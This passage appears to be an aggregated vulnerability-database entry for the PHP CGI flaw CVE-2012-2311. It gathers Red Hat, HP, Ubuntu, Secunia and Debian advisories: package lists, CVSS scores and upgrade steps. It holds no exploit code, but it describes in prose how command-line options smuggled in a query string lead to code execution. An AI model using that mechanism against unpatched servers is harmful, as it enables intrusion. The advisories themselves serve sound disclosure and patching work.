php-gd-5.3.3-14.el6_3.ppc64.rpm
php-ldap-5.3.3-14.el6_3.ppc64.rpm
php-mysql-5.3.3-14.el6_3.ppc64.rpm
php-odbc-5.3.3-14.el6_3.ppc64.rpm
php-pdo-5.3.3-14.el6_3.ppc64.rpm
php-pgsql-5.3.3-14.el6_3.ppc64.rpm
php-soap-5.3.3-14.el6_3.ppc64.rpm
php-xml-5.3.3-14.el6_3.ppc64.rpm
php-xmlrpc-5.3.3-14.el6_3.ppc64.rpm
s390x:
php-5.3.3-14.el6_3.s390x.rpm
php-cli-5.3.3-14.el6_3.s390x.rpm
php-common-5.3.3-14.el6_3.s390x.rpm
php-debuginfo-5.3.3-14.el6_3.s390x.rpm
php-gd-5.3.3-14.el6_3.s390x.rpm
php-ldap-5.3.3-14.el6_3.s390x.rpm
php-mysql-5.3.3-14.el6_3.s390x.rpm
php-odbc-5.3.3-14.el6_3.s390x.rpm
php-pdo-5.3.3-14.el6_3.s390x.rpm
php-pgsql-5.3.3-14.el6_3.s390x.rpm
php-soap-5.3.3-14.el6_3.s390x.rpm
php-xml-5.3.3-14.el6_3.s390x.rpm
php-xmlrpc-5.3.3-14.el6_3.s390x.rpm
x86_64:
php-5.3.3-14.el6_3.x86_64.rpm
php-cli-5.3.3-14.el6_3.x86_64.rpm
php-common-5.3.3-14.el6_3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.x86_64.rpm
php-gd-5.3.3-14.el6_3.x86_64.rpm
php-ldap-5.3.3-14.el6_3.x86_64.rpm
php-mysql-5.3.3-14.el6_3.x86_64.rpm
php-odbc-5.3.3-14.el6_3.x86_64.rpm
php-pdo-5.3.3-14.el6_3.x86_64.rpm
php-pgsql-5.3.3-14.el6_3.x86_64.rpm
php-soap-5.3.3-14.el6_3.x86_64.rpm
php-xml-5.3.3-14.el6_3.x86_64.rpm
php-xmlrpc-5.3.3-14.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm
i386:
php-bcmath-5.3.3-14.el6_3.i686.rpm
php-dba-5.3.3-14.el6_3.i686.rpm
php-debuginfo-5.3.3-14.el6_3.i686.rpm
php-devel-5.3.3-14.el6_3.i686.rpm
php-embedded-5.3.3-14.el6_3.i686.rpm
php-enchant-5.3.3-14.el6_3.i686.rpm
php-imap-5.3.3-14.el6_3.i686.rpm
php-intl-5.3.3-14.el6_3.i686.rpm
php-mbstring-5.3.3-14.el6_3.i686.rpm
php-process-5.3.3-14.el6_3.i686.rpm
php-pspell-5.3.3-14.el6_3.i686.rpm
php-recode-5.3.3-14.el6_3.i686.rpm
php-snmp-5.3.3-14.el6_3.i686.rpm
php-tidy-5.3.3-14.el6_3.i686.rpm
php-zts-5.3.3-14.el6_3.i686.rpm
ppc64:
php-bcmath-5.3.3-14.el6_3.ppc64.rpm
php-dba-5.3.3-14.el6_3.ppc64.rpm
php-debuginfo-5.3.3-14.el6_3.ppc64.rpm
php-devel-5.3.3-14.el6_3.ppc64.rpm
php-embedded-5.3.3-14.el6_3.ppc64.rpm
php-enchant-5.3.3-14.el6_3.ppc64.rpm
php-imap-5.3.3-14.el6_3.ppc64.rpm
php-intl-5.3.3-14.el6_3.ppc64.rpm
php-mbstring-5.3.3-14.el6_3.ppc64.rpm
php-process-5.3.3-14.el6_3.ppc64.rpm
php-pspell-5.3.3-14.el6_3.ppc64.rpm
php-recode-5.3.3-14.el6_3.ppc64.rpm
php-snmp-5.3.3-14.el6_3.ppc64.rpm
php-tidy-5.3.3-14.el6_3.ppc64.rpm
php-zts-5.3.3-14.el6_3.ppc64.rpm
s390x:
php-bcmath-5.3.3-14.el6_3.s390x.rpm
php-dba-5.3.3-14.el6_3.s390x.rpm
php-debuginfo-5.3.3-14.el6_3.s390x.rpm
php-devel-5.3.3-14.el6_3.s390x.rpm
php-embedded-5.3.3-14.el6_3.s390x.rpm
php-enchant-5.3.3-14.el6_3.s390x.rpm
php-imap-5.3.3-14.el6_3.s390x.rpm
php-intl-5.3.3-14.el6_3.s390x.rpm
php-mbstring-5.3.3-14.el6_3.s390x.rpm
php-process-5.3.3-14.el6_3.s390x.rpm
php-pspell-5.3.3-14.el6_3.s390x.rpm
php-recode-5.3.3-14.el6_3.s390x.rpm
php-snmp-5.3.3-14.el6_3.s390x.rpm
php-tidy-5.3.3-14.el6_3.s390x.rpm
php-zts-5.3.3-14.el6_3.s390x.rpm
x86_64:
php-bcmath-5.3.3-14.el6_3.x86_64.rpm
php-dba-5.3.3-14.el6_3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.x86_64.rpm
php-devel-5.3.3-14.el6_3.x86_64.rpm
php-embedded-5.3.3-14.el6_3.x86_64.rpm
php-enchant-5.3.3-14.el6_3.x86_64.rpm
php-imap-5.3.3-14.el6_3.x86_64.rpm
php-intl-5.3.3-14.el6_3.x86_64.rpm
php-mbstring-5.3.3-14.el6_3.x86_64.rpm
php-process-5.3.3-14.el6_3.x86_64.rpm
php-pspell-5.3.3-14.el6_3.x86_64.rpm
php-recode-5.3.3-14.el6_3.x86_64.rpm
php-snmp-5.3.3-14.el6_3.x86_64.rpm
php-tidy-5.3.3-14.el6_3.x86_64.rpm
php-zts-5.3.3-14.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm
i386:
php-5.3.3-14.el6_3.i686.rpm
php-cli-5.3.3-14.el6_3.i686.rpm
php-common-5.3.3-14.el6_3.i686.rpm
php-debuginfo-5.3.3-14.el6_3.i686.rpm
php-gd-5.3.3-14.el6_3.i686.rpm
php-ldap-5.3.3-14.el6_3.i686.rpm
php-mysql-5.3.3-14.el6_3.i686.rpm
php-odbc-5.3.3-14.el6_3.i686.rpm
php-pdo-5.3.3-14.el6_3.i686.rpm
php-pgsql-5.3.3-14.el6_3.i686.rpm
php-soap-5.3.3-14.el6_3.i686.rpm
php-xml-5.3.3-14.el6_3.i686.rpm
php-xmlrpc-5.3.3-14.el6_3.i686.rpm
x86_64:
php-5.3.3-14.el6_3.x86_64.rpm
php-cli-5.3.3-14.el6_3.x86_64.rpm
php-common-5.3.3-14.el6_3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.x86_64.rpm
php-gd-5.3.3-14.el6_3.x86_64.rpm
php-ldap-5.3.3-14.el6_3.x86_64.rpm
php-mysql-5.3.3-14.el6_3.x86_64.rpm
php-odbc-5.3.3-14.el6_3.x86_64.rpm
php-pdo-5.3.3-14.el6_3.x86_64.rpm
php-pgsql-5.3.3-14.el6_3.x86_64.rpm
php-soap-5.3.3-14.el6_3.x86_64.rpm
php-xml-5.3.3-14.el6_3.x86_64.rpm
php-xmlrpc-5.3.3-14.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm
i386:
php-bcmath-5.3.3-14.el6_3.i686.rpm
php-dba-5.3.3-14.el6_3.i686.rpm
php-debuginfo-5.3.3-14.el6_3.i686.rpm
php-devel-5.3.3-14.el6_3.i686.rpm
php-embedded-5.3.3-14.el6_3.i686.rpm
php-enchant-5.3.3-14.el6_3.i686.rpm
php-imap-5.3.3-14.el6_3.i686.rpm
php-intl-5.3.3-14.el6_3.i686.rpm
php-mbstring-5.3.3-14.el6_3.i686.rpm
php-process-5.3.3-14.el6_3.i686.rpm
php-pspell-5.3.3-14.el6_3.i686.rpm
php-recode-5.3.3-14.el6_3.i686.rpm
php-snmp-5.3.3-14.el6_3.i686.rpm
php-tidy-5.3.3-14.el6_3.i686.rpm
php-zts-5.3.3-14.el6_3.i686.rpm
x86_64:
php-bcmath-5.3.3-14.el6_3.x86_64.rpm
php-dba-5.3.3-14.el6_3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.x86_64.rpm
php-devel-5.3.3-14.el6_3.x86_64.rpm
php-embedded-5.3.3-14.el6_3.x86_64.rpm
php-enchant-5.3.3-14.el6_3.x86_64.rpm
php-imap-5.3.3-14.el6_3.x86_64.rpm
php-intl-5.3.3-14.el6_3.x86_64.rpm
php-mbstring-5.3.3-14.el6_3.x86_64.rpm
php-process-5.3.3-14.el6_3.x86_64.rpm
php-pspell-5.3.3-14.el6_3.x86_64.rpm
php-recode-5.3.3-14.el6_3.x86_64.rpm
php-snmp-5.3.3-14.el6_3.x86_64.rpm
php-tidy-5.3.3-14.el6_3.x86_64.rpm
php-zts-5.3.3-14.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2010-2950.html
https://www.redhat.com/security/data/cve/CVE-2011-4153.html
https://www.redhat.com/security/data/cve/CVE-2012-0057.html
https://www.redhat.com/security/data/cve/CVE-2012-0781.html
https://www.redhat.com/security/data/cve/CVE-2012-0789.html
https://www.redhat.com/security/data/cve/CVE-2012-1172.html
https://www.redhat.com/security/data/cve/CVE-2012-2143.html
https://www.redhat.com/security/data/cve/CVE-2012-2336.html
https://www.redhat.com/security/data/cve/CVE-2012-2386.html
https://access.redhat.com/security/updates/classification/#moderate
https://rhn.redhat.com/errata/RHSA-2012-0546.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03839862
Version: 1
HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and
Windows, Multiple Remote and Local Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-07-18
Last Updated: 2013-07-18
Potential Security Impact: Local Denial of Service (DoS), remote Denial of
Service (DoS), execution of arbitrary code, gain extended privileges,
disclosure of information, unauthorized access, XSS
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System
Management Homepage (SMH) running on Linux and Windows. The vulnerabilities
could be exploited remotely resulting in Local Denial of Service (DoS),
remote Denial of Service (DoS), execution of arbitrary code, gain privileges,
disclosure of information, unauthorized access, or XSS.
References:
CVE-2011-3389 (SSRT100740) Remote disclosure of information
CVE-2012-0883 (SSRT101209) Remote gain extended privileges
CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS)
CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code
CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS)
CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code
CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS)
CVE-2013-2355 (SSRT100696) Remote unauthorized Access
CVE-2013-2356 (SSRT100835) Remote disclosure of information
CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2361 (SSRT101007) XSS
CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS)
CVE-2013-2363 (SSRT101150) Remote disclosure of information
CVE-2013-2364 (SSRT101151) XSS
CVE-2013-5217 (SSRT101137) Remote unauthorized access
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and
Windows.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference      Base Vector                   Base Score
CVE-2011-3389  (AV:N/AC:M/Au:N/C:P/I:N/A:N)  4.3
CVE-2012-0883  (AV:L/AC:M/Au:N/C:C/I:C/A:C)  6.9
CVE-2012-2110  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
CVE-2012-2311  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
CVE-2012-2329  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
CVE-2012-2335  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
CVE-2012-2336  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
CVE-2013-2355  (AV:N/AC:M/Au:N/C:P/I:N/A:N)  4.3
CVE-2013-2356  (AV:N/AC:L/Au:N/C:C/I:N/A:N)  7.8
CVE-2013-2357  (AV:N/AC:M/Au:S/C:N/I:N/A:C)  6.3
CVE-2013-2358  (AV:N/AC:M/Au:S/C:N/I:N/A:C)  6.3
CVE-2013-2359  (AV:N/AC:M/Au:S/C:N/I:N/A:P)  3.5
CVE-2013-2360  (AV:N/AC:M/Au:S/C:N/I:N/A:P)  3.5
CVE-2013-2361  (AV:N/AC:M/Au:N/C:N/I:P/A:N)  4.3
CVE-2013-2362  (AV:L/AC:H/Au:S/C:N/I:N/A:P)  1.0
CVE-2013-2363  (AV:N/AC:H/Au:N/C:C/I:N/A:P)  6.1
CVE-2013-2364  (AV:N/AC:L/Au:S/C:N/I:N/A:P)  4.0
CVE-2013-5217  (AV:N/AC:H/Au:N/C:P/I:N/A:N)  2.6
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks agix for working with the TippingPoint
Zero Day Initiative to report vulnerability CVE-2013-2362 to
security-alert@hp.com
RESOLUTION
HP has made System Management Homepage (SMH) v7.2.1 or subsequent available
for Windows and Linux to resolve the vulnerabilities.
Information and updates for SMH can be found at the following location:
http://h18013.www1.hp.com/products/servers/management/agents/index.html
HISTORY
Version:1 (rev.1) - 18 July 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
============================================================================
Ubuntu Security Notice USN-1481-1
June 19, 2012
php5 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
Several security issues were fixed in PHP.
Software Description:
- php5: HTML-embedded scripting language interpreter
Details:
It was discovered that PHP incorrectly handled certain Tidy::diagnose
operations on invalid objects. (CVE-2012-1172)
Rubin Xu and Joseph Bonneau discovered that PHP incorrectly handled certain
Unicode characters in passwords passed to the crypt() function.
(CVE-2012-2143)
It was discovered that a Debian/Ubuntu specific patch caused PHP to
incorrectly handle empty salt strings. This issue only affected Ubuntu 10.04
LTS and Ubuntu 11.04. (CVE-2012-2317)
It was discovered that PHP, when used as a stand alone CGI processor
for the Apache Web Server, did not properly parse and filter query
strings. Configurations using mod_php5 and FastCGI were not vulnerable.
(CVE-2012-2386)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
php5 5.3.10-1ubuntu3.2
Ubuntu 11.10:
php5 5.3.6-13ubuntu3.8
Ubuntu 11.04:
php5 5.3.5-1ubuntu7.10
Ubuntu 10.04 LTS:
php5 5.3.2-1ubuntu4.17
Ubuntu 8.04 LTS:
php5 5.2.4-2ubuntu5.25
In general, a standard system update will make all the necessary changes
| VAR-201205-0246 | CVE-2012-2311 |
PHP of sapi/cgi/cgi_main.c Vulnerable to arbitrary code execution
Related entries in the VARIoT exploits database: VAR-E-201112-0006, VAR-E-201112-0007, VAR-E-201112-0002, VAR-E-201112-0008 |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823. This vulnerability is due to an insufficient fix for CVE-2012-1823. A third party could execute arbitrary code by placing command-line options in the query string. PHP is prone to an information-disclosure vulnerability.
Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible.
----------------------------------------------------------------------
TITLE:
Ubuntu update for php
SECUNIA ADVISORY ID:
SA49097
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49097/
RELEASE DATE:
2012-05-07
DESCRIPTION:
Ubuntu has issued an update for php. This fixes a vulnerability,
which can be exploited by malicious people to disclose certain
sensitive information or compromise a vulnerable system.
For more information:
SA49014
SOLUTION:
Apply updated packages.
ORIGINAL ADVISORY:
USN-1437-1:
http://www.ubuntu.com/usn/usn-1437-1/
.
Additionally, this update fixes insufficient validation of upload
name which led to corrupted $_FILES indices.
For the stable distribution (squeeze), this problem has been fixed in
version 5.3.3-7+squeeze9.
The testing distribution (wheezy) will be fixed soon.
For the unstable distribution (sid), this problem has been fixed in
version 5.4.3-1.
We recommend that you upgrade your php5 packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
.
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03368475
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03368475
Version: 1
HPSBUX02791 SSRT100856 rev.1 - HP-UX Apache Web Server running PHP, Remote
Execution of Arbitrary Code, Privilege Elevation, Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2012-06-14
Last Updated: 2012-06-14
Potential Security Impact: Remote execution of arbitrary code, privilege
elevation, or Denial of Service (DoS).
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX Apache Web
Server running PHP. These vulnerabilities could be exploited remotely to
execute arbitrary code, elevate privileges, or create a Denial of Service
(DoS). PHP is contained in the HP-UX Apache Web Server Suite.
References: CVE-2011-4153, CVE-2012-0830, CVE-2012-0883, CVE-2012-1172,
CVE-2012-1823, CVE-2012-2311
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23, B.11.31 running HP-UX Apache Web Server Suite v3.24 or earlier
BACKGROUND
For a PGP signed
CVSS 2.0 Base Metrics
===========================================================
Reference      Base Vector                   Base Score
CVE-2011-4153  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
CVE-2012-0830  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
CVE-2012-0883  (AV:L/AC:M/Au:N/C:C/I:C/A:C)  6.9
CVE-2012-1172  (AV:N/AC:M/Au:N/C:N/I:P/A:P)  5.8
CVE-2012-1823  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
CVE-2012-2311  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following software updates to resolve the
vulnerabilities.
The updates are available for download from http://software.hp.com
HP-UX Web Server Suite v.3.24 containing Apache v2.2.15.13 and PHP v5.2.17
HP-UX 11i Release   Apache Depot name
B.11.23 (32-bit)    HPUXWS22ATW-B324-32
B.11.23 (64-bit)    HPUXWS22ATW-B324-64
B.11.31 (32-bit)    HPUXWS22ATW-B324-32
B.11.31 (64-bit)    HPUXWS22ATW-B324-64
MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v3.24 or subsequent.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
HP-UX Web Server Suite v3.24
AFFECTED VERSIONS
HP-UX B.11.23
==============
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
action: install revision B.2.2.15.13 or subsequent
HP-UX B.11.31
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
action: install revision B.2.2.15.13 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 14 June 2012 Initial release
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Copyright 2012 Hewlett-Packard Development Company, L.P.
.
==========================================================================
Ubuntu Security Notice USN-1437-1
May 04, 2012
php5 vulnerability
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
Standalone PHP CGI scripts could be made to execute arbitrary code with
the privilege of the web server.
Software Description:
- php5: HTML-embedded scripting language interpreter
Details:
It was discovered that PHP, when used as a stand alone CGI processor
for the Apache Web Server, did not properly parse and filter query
strings. Configurations using
mod_php5 and FastCGI were not vulnerable.
This update addresses the issue when the PHP CGI interpreter
is configured using mod_cgi and mod_actions as described
in /usr/share/doc/php5-cgi/README.Debian.gz; however,
if an alternate configuration is used to enable PHP CGI
processing, it should be reviewed to ensure that command line
arguments cannot be passed to the PHP interpreter. Please see
http://people.canonical.com/~ubuntu-security/cve/2012/CVE-2012-2311.html
for more details and potential mitigation approaches.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
php5-cgi 5.3.10-1ubuntu3.1
Ubuntu 11.10:
php5-cgi 5.3.6-13ubuntu3.7
Ubuntu 11.04:
php5-cgi 5.3.5-1ubuntu7.8
Ubuntu 10.04 LTS:
php5-cgi 5.3.2-1ubuntu4.15
Ubuntu 8.04 LTS:
php5-cgi 5.2.4-2ubuntu5.24
In general, a standard system update will make all the necessary changes